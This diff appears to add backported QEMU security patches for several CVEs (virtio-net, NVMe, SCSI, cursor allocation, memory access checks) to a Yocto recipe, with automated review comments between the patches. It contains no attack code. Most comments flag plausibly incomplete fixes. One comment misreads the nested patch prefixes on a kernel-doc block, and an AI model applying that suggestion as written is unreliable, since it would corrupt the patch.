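+ case UAS_PIPE_ID_STATUS:
++ if (p->stream > UAS_MAX_STREAMS) {
++ goto err_stream;
++ }
+ if (p->stream) {
+ QTAILQ_FOREACH(st, &uas->results, next) {
+ if (st->stream == p->stream) {
+@@ -857,6 +860,9 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
+ break;
+ case UAS_PIPE_ID_DATA_IN:
+ case UAS_PIPE_ID_DATA_OUT:
++ if (p->stream > UAS_MAX_STREAMS) {
++ goto err_stream;
++ }
+ if (p->stream) {
+ req = usb_uas_find_request(uas, p->stream);
+ } else {
+@@ -892,6 +898,11 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
+ p->status = USB_RET_STALL;
+ break;
+ }
++
++err_stream:
++ error_report("%s: invalid stream %d", __func__, p->stream);
++ p->status = USB_RET_STALL;
++ return;
+ }
+
+ static void usb_uas_unrealize(USBDevice *dev, Error **errp)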
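Review bot: The `err_stream:` label in the last hunk sits directly after the closing brace of the switch with no `return` in front of it, so every case that leaves the switch via `break` falls through into the error block. Valid packets would then be logged as "invalid stream" and have `p->status` overwritten with `USB_RET_STALL`. Adding `return;` on the line before `err_stream:` keeps the block reachable only from the two `goto err_stream` sites. usb_uas_handle_data starts outside the hunks, so the brace above the label is assumed to close the switch.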
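--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch
@@ -0,0 +1,124 @@
+From bedd7e93d01961fcb16a97ae45d93acf357e11f6 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Thu, 2 Sep 2021 13:44:12 +0800
+Subject: [PATCH] virtio-net: fix use after unmap/free for sg
+
+When mergeable buffer is enabled, we try to set the num_buffers after
+the virtqueue elem has been unmapped. This will lead several issues,
+E.g a use after free when the descriptor has an address which belongs
+to the non direct access region. In this case we use bounce buffer
+that is allocated during address_space_map() and freed during
+address_space_unmap().
+
+Fixing this by storing the elems temporarily in an array and delay the
+unmap after we set the the num_buffers.
+
+This addresses CVE-2021-3748.
+
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Fixes: fbe78f4f55c6 ("virtio-net support")
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+https://github.com/qemu/qemu/commit/bedd7e93d01961fcb16a97ae45d93acf357e11f6
+CVE: CVE-2021-3748
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/net/virtio-net.c | 39 ++++++++++++++++++++++++++++++++-------
+ 1 file changed, 32 insertions(+), 7 deletions(-)
+
+diff --git a/hw/net/virtio-net.c b/hw/net/virtio-net.c
+index 16d20cdee52a..f205331dcf8c 100644
+--- a/hw/net/virtio-net.c
++++ b/hw/net/virtio-net.c
+@@ -1746,10 +1746,13 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ VirtIONet *n = qemu_get_nic_opaque(nc);
+ VirtIONetQueue *q = virtio_net_get_subqueue(nc);
+ VirtIODevice *vdev = VIRTIO_DEVICE(n);
++ VirtQueueElement *elems[VIRTQUEUE_MAX_SIZE];
++ size_t lens[VIRTQUEUE_MAX_SIZE];
+ struct iovec mhdr_sg[VIRTQUEUE_MAX_SIZE];
+ struct virtio_net_hdr_mrg_rxbuf mhdr;
+ unsigned mhdr_cnt = 0;
+- size_t offset, i, guest_offset;
++ size_t offset, i, guest_offset, j;
++ ssize_t err;
+
+ if (!virtio_net_can_receive(nc)) {
+ return -1;
+@@ -1780,6 +1783,12 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+
+ total = 0;
+
++ if (i == VIRTQUEUE_MAX_SIZE) {
++ virtio_error(vdev, "virtio-net unexpected long buffer chain");
++ err = size;
++ goto err;
++ }
++
+ elem = virtqueue_pop(q->rx_vq, sizeof(VirtQueueElement));
+ if (!elem) {
+ if (i) {
+@@ -1791,7 +1800,8 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ n->guest_hdr_len, n->host_hdr_len,
+ vdev->guest_features);
+ }
+- return -1;
++ err = -1;
++ goto err;
+ }
+
+ if (elem->in_num < 1) {
+@@ -1799,7 +1809,8 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ "virtio-net receive queue contains no in buffers");
+ virtqueue_detach_element(q->rx_vq, elem, 0);
+ g_free(elem);
+- return -1;
++ err = -1;
++ goto err;
+ }
+
+ sg = elem->in_sg;
+@@ -1836,12 +1847,13 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ if (!n->mergeable_rx_bufs && offset < size) {
+ virtqueue_unpop(q->rx_vq, elem, total);
+ g_free(elem);
+- return size;
++ err = size;
++ goto err;
+ }
+
+- /* signal other side */
+- virtqueue_fill(q->rx_vq, elem, total, i++);
+- g_free(elem);
++ elems[i] = elem;
++ lens[i] = total;
++ i++;
+ }
+
+ if (mhdr_cnt) {
+@@ -1851,10 +1863,23 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ &mhdr.num_buffers, sizeof mhdr.num_buffers);
+ }
+
++ for (j = 0; j < i; j++) {
++ /* signal other side */
++ virtqueue_fill(q->rx_vq, elems[j], lens[j], j);
++ g_free(elems[j]);
++ }
++
+ virtqueue_flush(q->rx_vq, i);
+ virtio_notify(vdev, q->rx_vq);
+
+ return size;
++
++err:
++ for (j = 0; j < i; j++) {
++ g_free(elems[j]);
++ }
++
++ return err;
+ }
+
+ static ssize_t virtio_net_do_receive(NetClientState *nc, const uint8_t *buf,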
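Review bot: The new `err:` path in virtio_net_receive_rcu releases the queued elements with `g_free(elems[j])` only, so elements that were popped and stored in `elems[]` on earlier iterations are never detached from the virtqueue and their mappings are not released when a later iteration fails. Consider calling `virtqueue_detach_element(q->rx_vq, elems[j], lens[j]);` before `g_free(elems[j]);` in that loop, as the no-in-buffers branch of the same function already does for a single element. The function starts and continues outside the visible hunks, so confirm against the full source that no other cleanup covers these elements.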
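--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch
@@ -0,0 +1,180 @@
+From 1938fbc7ec197e2612ab2ce36dd69bff19208aa5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 10 Oct 2022 17:44:41 +0530
+Subject: [PATCH] CVE-2021-3750
+
+Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=b9d383ab797f54ae5fa8746117770709921dc529 && https://git.qemu.org/?p=qemu.git;a=commit;h=3ab6fdc91b72e156da22848f0003ff4225690ced && https://git.qemu.org/?p=qemu.git;a=commit;h=58e74682baf4e1ad26b064d8c02e5bc99c75c5d9]
+CVE: CVE-2021-3750
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ exec.c | 55 +++++++++++++++++++++++++++++++-------
+ hw/intc/arm_gicv3_redist.c | 4 +--
+ include/exec/memattrs.h | 9 +++++++
+ 3 files changed, 56 insertions(+), 12 deletions(-)
+
+diff --git a/exec.c b/exec.c
+index 1360051a..10581d8d 100644
+--- a/exec.c
++++ b/exec.c
+@@ -39,6 +39,7 @@
+ #include "qemu/config-file.h"
+ #include "qemu/error-report.h"
+ #include "qemu/qemu-print.h"
++#include "qemu/log.h"
+ #if defined(CONFIG_USER_ONLY)
+ #include "qemu.h"
+ #else /* !CONFIG_USER_ONLY */
+@@ -3118,6 +3119,33 @@ static bool prepare_mmio_access(MemoryRegion *mr)
+ return release_lock;
+ }
+
++/**
+++ * flatview_access_allowed
+++ * @mr: #MemoryRegion to be accessed
+++ * @attrs: memory transaction attributes
+++ * @addr: address within that memory region
+++ * @len: the number of bytes to access
+++ *
+++ * Check if a memory transaction is allowed.
+++ *
+++ * Returns: true if transaction is allowed, false if denied.
+++ */
++static bool flatview_access_allowed(MemoryRegion *mr, MemTxAttrs attrs,
++ hwaddr addr, hwaddr len)
++{
++ if (likely(!attrs.memory)) {
++ return true;
++ }
++ if (memory_region_is_ram(mr)) {
++ return true;
++ }
++ qemu_log_mask(LOG_GUEST_ERROR,
++ "Invalid access to non-RAM device at "
++ "addr 0x%" HWADDR_PRIX ", size %" HWADDR_PRIu ", "
++ "region '%s'\n", addr, len, memory_region_name(mr));
++ return false;
++}
++
+ /* Called within RCU critical section. */
+ static MemTxResult flatview_write_continue(FlatView *fv, hwaddr addr,
+ MemTxAttrs attrs,
+@@ -3131,7 +3159,10 @@ static MemTxResult flatview_write_continue(FlatView *fv, hwaddr addr,
+ bool release_lock = false;
+
+ for (;;) {
+- if (!memory_access_is_direct(mr, true)) {
++ if (!flatview_access_allowed(mr, attrs, addr1, l)) {
++ result |= MEMTX_ACCESS_ERROR;
++ /* Keep going. */
++ } else if (!memory_access_is_direct(mr, true)) {
+ release_lock |= prepare_mmio_access(mr);
+ l = memory_access_size(mr, l, addr1);
+ /* XXX: could force current_cpu to NULL to avoid
+@@ -3173,14 +3204,14 @@ static MemTxResult flatview_write(FlatView *fv, hwaddr addr, MemTxAttrs attrs,
+ hwaddr l;
+ hwaddr addr1;
+ MemoryRegion *mr;
+- MemTxResult result = MEMTX_OK;
+
+ l = len;
+ mr = flatview_translate(fv, addr, &addr1, &l, true, attrs);
+- result = flatview_write_continue(fv, addr, attrs, buf, len,
+- addr1, l, mr);
+-
+- return result;
++ if (!flatview_access_allowed(mr, attrs, addr, len)) {
++ return MEMTX_ACCESS_ERROR;
++ }
++ return flatview_write_continue(fv, addr, attrs, buf, len,
++ addr1, l, mr);
+ }
+
+ /* Called within RCU critical section. */
+@@ -3195,7 +3226,10 @@ MemTxResult flatview_read_continue(FlatView *fv, hwaddr addr,
+ bool release_lock = false;
+
+ for (;;) {
+- if (!memory_access_is_direct(mr, false)) {
++ if (!flatview_access_allowed(mr, attrs, addr1, l)) {
++ result |= MEMTX_ACCESS_ERROR;
++ /* Keep going. */
++ } else if (!memory_access_is_direct(mr, false)) {
+ /* I/O case */
+ release_lock |= prepare_mmio_access(mr);
+ l = memory_access_size(mr, l, addr1);
+@@ -3238,6 +3272,9 @@ static MemTxResult flatview_read(FlatView *fv, hwaddr addr,
+
+ l = len;
+ mr = flatview_translate(fv, addr, &addr1, &l, false, attrs);
++ if (!flatview_access_allowed(mr, attrs, addr, len)) {
++ return MEMTX_ACCESS_ERROR;
++ }
+ return flatview_read_continue(fv, addr, attrs, buf, len,
+ addr1, l, mr);
+ }
+@@ -3474,12 +3511,10 @@ bool address_space_access_valid(AddressSpace *as, hwaddr addr,
+ MemTxAttrs attrs)
+ {
+ FlatView *fv;
+- bool result;
+
+ RCU_READ_LOCK_GUARD();
+ fv = address_space_to_flatview(as);
+- result = flatview_access_valid(fv, addr, len, is_write, attrs);
+- return result;
++ return flatview_access_valid(fv, addr, len, is_write, attrs);
+ }
+
+ static hwaddr
+diff --git a/hw/intc/arm_gicv3_redist.c b/hw/intc/arm_gicv3_redist.c
+index 8645220d..44368e28 100644
+--- a/hw/intc/arm_gicv3_redist.c
++++ b/hw/intc/arm_gicv3_redist.c
+@@ -450,7 +450,7 @@ MemTxResult gicv3_redist_read(void *opaque, hwaddr offset, uint64_t *data,
+ break;
+ }
+
+- if (r == MEMTX_ERROR) {
++ if (r != MEMTX_OK) {
+ qemu_log_mask(LOG_GUEST_ERROR,
+ "%s: invalid guest read at offset " TARGET_FMT_plx
+ "size %u\n", __func__, offset, size);
+@@ -507,7 +507,7 @@ MemTxResult gicv3_redist_write(void *opaque, hwaddr offset, uint64_t data,
+ break;
+ }
+
+- if (r == MEMTX_ERROR) {
++ if (r != MEMTX_OK) {
+ qemu_log_mask(LOG_GUEST_ERROR,
+ "%s: invalid guest write at offset " TARGET_FMT_plx
+ "size %u\n", __func__, offset, size);
+diff --git a/include/exec/memattrs.h b/include/exec/memattrs.h
+index 95f2d20d..9fb98bc1 100644
+--- a/include/exec/memattrs.h
++++ b/include/exec/memattrs.h
+@@ -35,6 +35,14 @@ typedef struct MemTxAttrs {
+ unsigned int secure:1;
+ /* Memory access is usermode (unprivileged) */
+ unsigned int user:1;
++ /*
++ * Bus interconnect and peripherals can access anything (memories,
++ * devices) by default. By setting the 'memory' bit, bus transaction
++ * are restricted to "normal" memories (per the AMBA documentation)
++ * versus devices. Access to devices will be logged and rejected
++ * (see MEMTX_ACCESS_ERROR).
++ */
++ unsigned int memory:1;
+ /* Requester ID (for MSI for example) */
+ unsigned int requester_id:16;
+ /* Invert endianness for this page */
+@@ -66,6 +74,7 @@ typedef struct MemTxAttrs {
+ #define MEMTX_OK 0
+ #define MEMTX_ERROR (1U << 0) /* device returned an error */
+ #define MEMTX_DECODE_ERROR (1U << 1) /* nothing at that address */
++#define MEMTX_ACCESS_ERROR (1U << 2) /* access denied */
+ typedef uint32_t MemTxResult;
+
+ #endif
+--
+2.25.1
+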
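Review bot: Nothing in this patch sets the new `MemTxAttrs.memory` bit, so `flatview_access_allowed()` always returns through its first branch, `if (likely(!attrs.memory)) return true;`, and the checks added to flatview_read, flatview_write and the two `*_continue` loops reject nothing as written. If the device models that should be limited to RAM are meant to pass `.memory = true`, that change has to come from another patch, and it is worth confirming it is part of this backport series before the recipe treats the CVE as fixed. Separately, the kernel-doc block above flatview_access_allowed carries a stray `+` at the start of each comment line (`+ * @mr: ...`), which will land in exec.c; those lines should read ` * @mr: ...`.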
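--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch
@@ -0,0 +1,81 @@
+From 2c682b5975b41495f98cc34b8243042c446eec44 Mon Sep 17 00:00:00 2001
+From: Gaurav Gupta <gauragup@cisco.com>
+Date: Wed, 29 Mar 2023 14:36:16 -0700
+Subject: [PATCH] hw/nvme: fix CVE-2021-3929 MIME-Version: 1.0 Content-Type:
+ text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This fixes CVE-2021-3929 "locally" by denying DMA to the iomem of the
+device itself. This still allows DMA to MMIO regions of other devices
+(e.g. doing P2P DMA to the controller memory buffer of another NVMe
+device).
+
+Fixes: CVE-2021-3929
+Reported-by: Qiuhao Li <Qiuhao.Li@outlook.com>
+Reviewed-by: Keith Busch <kbusch@kernel.org>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
+
+Upstream-Status: Backport
+[https://gitlab.com/qemu-project/qemu/-/commit/736b01642d85be832385]
+CVE: CVE-2021-3929
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+Signed-off-by: Gaurav Gupta <gauragup@cisco.com>
+---
+ hw/block/nvme.c | 23 +++++++++++++++++++++++
+ hw/block/nvme.h | 1 +
+ 2 files changed, 24 insertions(+)
+
+diff --git a/hw/block/nvme.c b/hw/block/nvme.c
+index bda446d..ae9b19f 100644
+--- a/hw/block/nvme.c
++++ b/hw/block/nvme.c
+@@ -60,8 +60,31 @@ static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
+ return addr >= low && addr < hi;
+ }
+
++static inline bool nvme_addr_is_iomem(NvmeCtrl *n, hwaddr addr)
++{
++ hwaddr hi, lo;
++
++ /*
++ * The purpose of this check is to guard against invalid "local" access to
++ * the iomem (i.e. controller registers). Thus, we check against the range
++ * covered by the 'bar0' MemoryRegion since that is currently composed of
++ * two subregions (the NVMe "MBAR" and the MSI-X table/pba). Note, however,
++ * that if the device model is ever changed to allow the CMB to be located
++ * in BAR0 as well, then this must be changed.
++ */
++ lo = n->bar0.addr;
++ hi = lo + int128_get64(n->bar0.size);
++
++ return addr >= lo && addr < hi;
++}
++
+ static int nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+ {
++
++ if (nvme_addr_is_iomem(n, addr)) {
++ return NVME_DATA_TRAS_ERROR;
++ }
++
+ if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
+ memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
+ return 0;
+diff --git a/hw/block/nvme.h b/hw/block/nvme.h
+index 557194e..5a2b119 100644
+--- a/hw/block/nvme.h
++++ b/hw/block/nvme.h
+@@ -59,6 +59,7 @@ typedef struct NvmeNamespace {
+
+ typedef struct NvmeCtrl {
+ PCIDevice parent_obj;
++ MemoryRegion bar0;
+ MemoryRegion iomem;
+ MemoryRegion ctrl_mem;
+ NvmeBar bar;
+--
+1.8.3.1
+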
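Review bot: `nvme_addr_is_iomem()` reads `n->bar0.addr` and `n->bar0.size`, but the only other reference to `bar0` in this patch is the new `MemoryRegion bar0;` field in NvmeCtrl; no visible hunk initialises that region or registers it as a BAR. If nothing else in the tree does, both values stay zero, `addr >= lo && addr < hi` is never true, and the guard added to nvme_addr_read rejects nothing. Assuming this tree still maps the controller registers through `n->iomem`, the range should come from that region, e.g. `lo = n->iomem.addr;` and `hi = lo + int128_get64(n->iomem.size);`, and the unused field can be dropped. nvme_addr_read continues outside the hunk.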
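--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch
@@ -0,0 +1,53 @@
+From b3af7fdf9cc537f8f0dd3e2423d83f5c99a457e8 Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Thu, 4 Nov 2021 17:31:38 +0100
+Subject: [PATCH] hw/scsi/scsi-disk: MODE_PAGE_ALLS not allowed in MODE SELECT
+ commands
+
+This avoids an off-by-one read of 'mode_sense_valid' buffer in
+hw/scsi/scsi-disk.c:mode_sense_page().
+
+Fixes: CVE-2021-3930
+Cc: qemu-stable@nongnu.org
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Fixes: a8f4bbe2900 ("scsi-disk: store valid mode pages in a table")
+Fixes: #546
+Reported-by: Qiuhao Li <Qiuhao.Li@outlook.com>
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/b3af7fdf9cc537f8f0dd3e2423d83f5c99a457e8
+CVE: CVE-2021-3930
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/scsi-disk.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/hw/scsi/scsi-disk.c b/hw/scsi/scsi-disk.c
+index e8a547dbb7..d4914178ea 100644
+--- a/hw/scsi/scsi-disk.c
++++ b/hw/scsi/scsi-disk.c
+@@ -1087,6 +1087,7 @@ static int mode_sense_page(SCSIDiskState *s, int page, uint8_t **p_outbuf,
+ uint8_t *p = *p_outbuf + 2;
+ int length;
+
++ assert(page < ARRAY_SIZE(mode_sense_valid));
+ if ((mode_sense_valid[page] & (1 << s->qdev.type)) == 0) {
+ return -1;
+ }
+@@ -1428,6 +1429,11 @@ static int scsi_disk_check_mode_select(SCSIDiskState *s, int page,
+ return -1;
+ }
+
++ /* MODE_PAGE_ALLS is only valid for MODE SENSE commands */
++ if (page == MODE_PAGE_ALLS) {
++ return -1;
++ }
++
+ p = mode_current;
+ memset(mode_current, 0, inlen + 2);
+ len = mode_sense_page(s, page, &p, 0);
+--
+GitLab
+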
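Review bot: The `assert(page < ARRAY_SIZE(mode_sense_valid));` added to mode_sense_page turns any out-of-range page that reaches it into a process abort, so the function now depends on every caller filtering the page code first, and that contract is not written down. A short comment above the assert would make it explicit, e.g. `/* Callers must reject MODE_PAGE_ALLS and any page outside mode_sense_valid[] before calling. */`. The second hunk adds that filter for scsi_disk_check_mode_select; the other callers of mode_sense_page are outside the visible hunks and should be checked the same way.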
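--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch
@@ -0,0 +1,89 @@
+From fa892e9abb728e76afcf27323ab29c57fb0fe7aa Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Thu, 7 Apr 2022 10:17:12 +0200
+Subject: [PATCH] ui/cursor: fix integer overflow in cursor_alloc
+ (CVE-2021-4206)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Prevent potential integer overflow by limiting 'width' and 'height' to
+512x512. Also change 'datasize' type to size_t. Refer to security
+advisory https://starlabs.sg/advisories/22-4206/ for more information.
+
+Fixes: CVE-2021-4206
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20220407081712.345609-1-mcascell@redhat.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/fa892e9a
+CVE: CVE-2021-4206
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/display/qxl-render.c | 7 +++++++
+ hw/display/vmware_vga.c | 2 ++
+ ui/cursor.c | 8 +++++++-
+ 3 files changed, 16 insertions(+), 1 deletion(-)
+
+diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
+index 237ed293ba..ca217004bf 100644
+--- a/hw/display/qxl-render.c
++++ b/hw/display/qxl-render.c
+@@ -247,6 +247,13 @@ static QEMUCursor *qxl_cursor(PCIQXLDevice *qxl, QXLCursor *cursor,
+ size_t size;
+
+ c = cursor_alloc(cursor->header.width, cursor->header.height);
++
++ if (!c) {
++ qxl_set_guest_bug(qxl, "%s: cursor %ux%u alloc error", __func__,
++ cursor->header.width, cursor->header.height);
++ goto fail;
++ }
++
+ c->hot_x = cursor->header.hot_spot_x;
+ c->hot_y = cursor->header.hot_spot_y;
+ switch (cursor->header.type) {
+diff --git a/hw/display/vmware_vga.c b/hw/display/vmware_vga.c
+index 98c83474ad..45d06cbe25 100644
+--- a/hw/display/vmware_vga.c
++++ b/hw/display/vmware_vga.c
+@@ -515,6 +515,8 @@ static inline void vmsvga_cursor_define(struct vmsvga_state_s *s,
+ int i, pixels;
+
+ qc = cursor_alloc(c->width, c->height);
++ assert(qc != NULL);
++
+ qc->hot_x = c->hot_x;
+ qc->hot_y = c->hot_y;
+ switch (c->bpp) {
+diff --git a/ui/cursor.c b/ui/cursor.c
+index 1d62ddd4d0..835f0802f9 100644
+--- a/ui/cursor.c
++++ b/ui/cursor.c
+@@ -46,6 +46,8 @@ static QEMUCursor *cursor_parse_xpm(const char *xpm[])
+
+ /* parse pixel data */
+ c = cursor_alloc(width, height);
++ assert(c != NULL);
++
+ for (pixel = 0, y = 0; y < height; y++, line++) {
+ for (x = 0; x < height; x++, pixel++) {
+ idx = xpm[line][x];
+@@ -91,7 +93,11 @@ QEMUCursor *cursor_builtin_left_ptr(void)
+ QEMUCursor *cursor_alloc(int width, int height)
+ {
+ QEMUCursor *c;
+- int datasize = width * height * sizeof(uint32_t);
++ size_t datasize = width * height * sizeof(uint32_t);
++
++ if (width > 512 || height > 512) {
++ return NULL;
++ }
+
+ c = g_malloc0(sizeof(QEMUCursor) + datasize);
+ c->width = width;
+--
+GitLab
+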
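Review bot: In cursor_alloc the size is still computed before the new bounds check, and `width * height` is evaluated in `int` before it is widened to `size_t`, so the multiplication can overflow ahead of the `width > 512 || height > 512` test; that test also lets negative values through. Moving the computation below the check and widening first avoids both: `if (width < 0 || height < 0 || width > 512 || height > 512) { return NULL; }` followed by `datasize = (size_t)width * height * sizeof(uint32_t);`. In vmsvga_cursor_define the added `assert(qc != NULL);` means dimensions above 512 abort the process unless they are bounded earlier in that function, which is outside the hunk.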
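--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch
@@ -0,0 +1,43 @@
+From 9569f5cb5b4bffa9d3ebc8ba7da1e03830a9a895 Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Thu, 7 Apr 2022 10:11:06 +0200
+Subject: [PATCH] display/qxl-render: fix race condition in qxl_cursor
+ (CVE-2021-4207)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Avoid fetching 'width' and 'height' a second time to prevent possible
+race condition. Refer to security advisory
+https://starlabs.sg/advisories/22-4207/ for more information.
+
+Fixes: CVE-2021-4207
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20220407081106.343235-1-mcascell@redhat.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/9569f5cb
+CVE: CVE-2021-4207
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/display/qxl-render.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
+index d28849b121..237ed293ba 100644
+--- a/hw/display/qxl-render.c
++++ b/hw/display/qxl-render.c
+@@ -266,7 +266,7 @@ static QEMUCursor *qxl_cursor(PCIQXLDevice *qxl, QXLCursor *cursor,
+ }
+ break;
+ case SPICE_CURSOR_TYPE_ALPHA:
+- size = sizeof(uint32_t) * cursor->header.width * cursor->header.height;
++ size = sizeof(uint32_t) * c->width * c->height;
+ qxl_unpack_chunks(c->data, size, qxl, &cursor->chunk, group_id);
+ if (qxl->debug > 2) {
+ cursor_print_ascii_art(c, "qxl/alpha");
+--
+GitLab
+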
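--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch
@@ -0,0 +1,42 @@
+From 6c8fa961da5e60f574bb52fd3ad44b1e9e8ad4b8 Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Tue, 5 Jul 2022 22:05:43 +0200
+Subject: [PATCH] scsi/lsi53c895a: fix use-after-free in lsi_do_msgout
+ (CVE-2022-0216)
+
+Set current_req->req to NULL to prevent reusing a free'd buffer in case of
+repeated SCSI cancel requests. Thanks to Thomas Huth for suggesting the patch.
+
+Fixes: CVE-2022-0216
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/972
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Reviewed-by: Thomas Huth <thuth@redhat.com>
+Message-Id: <20220705200543.2366809-1-mcascell@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/6c8fa961da5e60f574bb52fd3ad44b1e9e8ad4b8
+CVE: CVE-2022-0216
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/lsi53c895a.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/hw/scsi/lsi53c895a.c b/hw/scsi/lsi53c895a.c
+index c8773f73f7..99ea42d49b 100644
+--- a/hw/scsi/lsi53c895a.c
++++ b/hw/scsi/lsi53c895a.c
+@@ -1028,8 +1028,9 @@ static void lsi_do_msgout(LSIState *s)
+ case 0x0d:
+ /* The ABORT TAG message clears the current I/O process only. */
+ trace_lsi_do_msgout_abort(current_tag);
+- if (current_req) {
++ if (current_req && current_req->req) {
+ scsi_req_cancel(current_req->req);
++ current_req->req = NULL;
+ }
+ lsi_disconnect(s);
+ break;
+--
+GitLab
+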
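--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch
@@ -0,0 +1,52 @@
+From 4367a20cc442c56b05611b4224de9a61908f9eac Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Mon, 11 Jul 2022 14:33:16 +0200
+Subject: [PATCH] scsi/lsi53c895a: really fix use-after-free in lsi_do_msgout
+ (CVE-2022-0216)
+
+Set current_req to NULL, not current_req->req, to prevent reusing a free'd
+buffer in case of repeated SCSI cancel requests. Also apply the fix to
+CLEAR QUEUE and BUS DEVICE RESET messages as well, since they also cancel
+the request.
+
+Thanks to Alexander Bulekov for providing a reproducer.
+
+Fixes: CVE-2022-0216
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/972
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20220711123316.421279-1-mcascell@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/4367a20cc4
+CVE: CVE-2022-0216
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/lsi53c895a.c | 3 +-
+ 1 files changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/hw/scsi/lsi53c895a.c b/hw/scsi/lsi53c895a.c
+index 99ea42d49b..ad5f5e5f39 100644
+--- a/hw/scsi/lsi53c895a.c
++++ b/hw/scsi/lsi53c895a.c
+@@ -1030,7 +1030,7 @@ static void lsi_do_msgout(LSIState *s)
+ trace_lsi_do_msgout_abort(current_tag);
+ if (current_req && current_req->req) {
+ scsi_req_cancel(current_req->req);
+- current_req->req = NULL;
++ current_req = NULL;
+ }
+ lsi_disconnect(s);
+ break;
+@@ -1056,6 +1056,7 @@ static void lsi_do_msgout(LSIState *s)
+ /* clear the current I/O process */
+ if (s->current) {
+ scsi_req_cancel(s->current->req);
++ current_req = NULL;
+ }
+
+ /* As the current implemented devices scsi_disk and scsi_generic
+--
+GitLab
+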
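--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch
@@ -0,0 +1,57 @@
+Backport of:
+
+From 8d1b247f3748ac4078524130c6d7ae42b6140aaf Mon Sep 17 00:00:00 2001
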